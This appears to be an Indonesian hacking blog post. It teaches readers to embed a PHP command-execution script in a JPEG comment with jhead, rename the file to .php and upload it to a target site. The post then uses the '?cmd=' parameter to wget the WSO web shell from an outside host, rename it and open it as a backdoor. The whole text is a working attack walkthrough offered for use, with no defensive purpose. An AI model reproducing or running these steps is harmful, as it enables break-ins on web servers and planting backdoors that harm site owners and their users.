Haii Para sobat Master Linuxser berhubung mood gue lagi bagus kali ini gw , gw mau sharing tutorial inject script php ke gambar dengan menggunakan jhead. Tapi gw ga akan menjamin walaupun udah pake teknik seperti ini shell 100% akan terupload loh ya hehe.
Oke selanjutnya,
Buat yang make Linux atau juga bisa make Termux. Yang pertama install dulu jhead seperti ini,
- $ pkg install jhead
Setelah terinstall, siapkan gambar yang mau di inject dengan extensesinya jpg kalo ga punya bisa download di mbah gugel dan disini gue make gambar umaru.jpg hahaha
Selanjutnya buka terminal linux atau termux kalian, dan cari dimana tempat kalian menyimpan gambar. Dan setelah itu kalian ketikan perintah dibawah ini untuk membersihkan comment pada gambar tersebut.
- $ jhead -purejpg namafile.jpg
Setelah bersih gambarnya dari comment, kalian ketikan perintah seperti berikut ini,
- $ jhead -ce namafile.jpg
Habis itu kalian masukan script inject php di vim text editor, untuk mendownload scriptnya kalian bisa klik disini, setelah itu kalian save dan untuk cara menyimpanya kalian tekan esc dulu dikeyboard baru kalian terus tuliskan :x
Kalo ada tulisan modified namafile.jpg berarti sukses, selanjutnya kita cek script inject php apa sudah masuk dengan mengetikan perintah seperti ini,
- $ jhead namafile.jpg
Dan nanti akan muncul gambar seperti ini,
Jika muncul code pada gambar seperti diatas, berarti inject script phpnya sudah masuk kedalam gambar tersebut dan tinggal direname ke extensi php lalu upload ditarget kalian.
Nah oke, setelah selesai injectnya sekarang simak untuk cara menggunakanya ketikan perintah seperti berikut ini,
- /namafile.php?cmd=
Untuk upload shell atau backdoor kalian bisa mengunakan fungsi wget, curl, atau yang lain karena terkadang ada website yang tidak suport wget atau curl.
Contoh perintah untuk melakukan upload shell atau backdoor seperti berikut ini,
- localhost/umaru.php?cmd=wget http://linkshell.com/php/wso.txt
Setelah terupload, terus kita rename wso.txt menjadi wso.php dengan perintah seperti ini,
- localhost/umaru.php?cmd=mv wso.txt wso.php
Dan untuk akses shellnya seperti ini,
- localhost/wso.php
Sumber : https://maqlo-heker.blogspot.com/
Oke sekian dari gue, semoga bermanfaat bagi kalian semua terimah kasih sudah berkunjung dan membaca di blog saya :)
Adalah seorang yang senang mempelajari hal-hal baru seputar dunia Teknologi, Internet dan Bisnis Online.